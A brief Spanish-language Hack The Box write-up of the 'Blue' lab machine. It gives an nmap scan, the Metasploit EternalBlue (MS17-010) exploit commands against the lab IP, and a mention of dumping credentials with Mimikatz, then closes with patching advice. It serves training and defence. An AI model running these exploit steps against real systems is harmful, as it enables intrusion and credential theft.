HTB — Blue (EternalBlue)

Reconocimiento

Empezamos con un escaneo de puertos:

nmap -sV -sC -oN blue.txt 10.10.10.40

El puerto 445 está abierto — SMB vulnerable a EternalBlue.

Explotación

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
run

Post-explotación

Con acceso como SYSTEM, usamos Mimikatz para extraer credenciales.

Lecciones

• Siempre parchear SMB en sistemas Windows
• MS17-010 sigue siendo común en entornos reales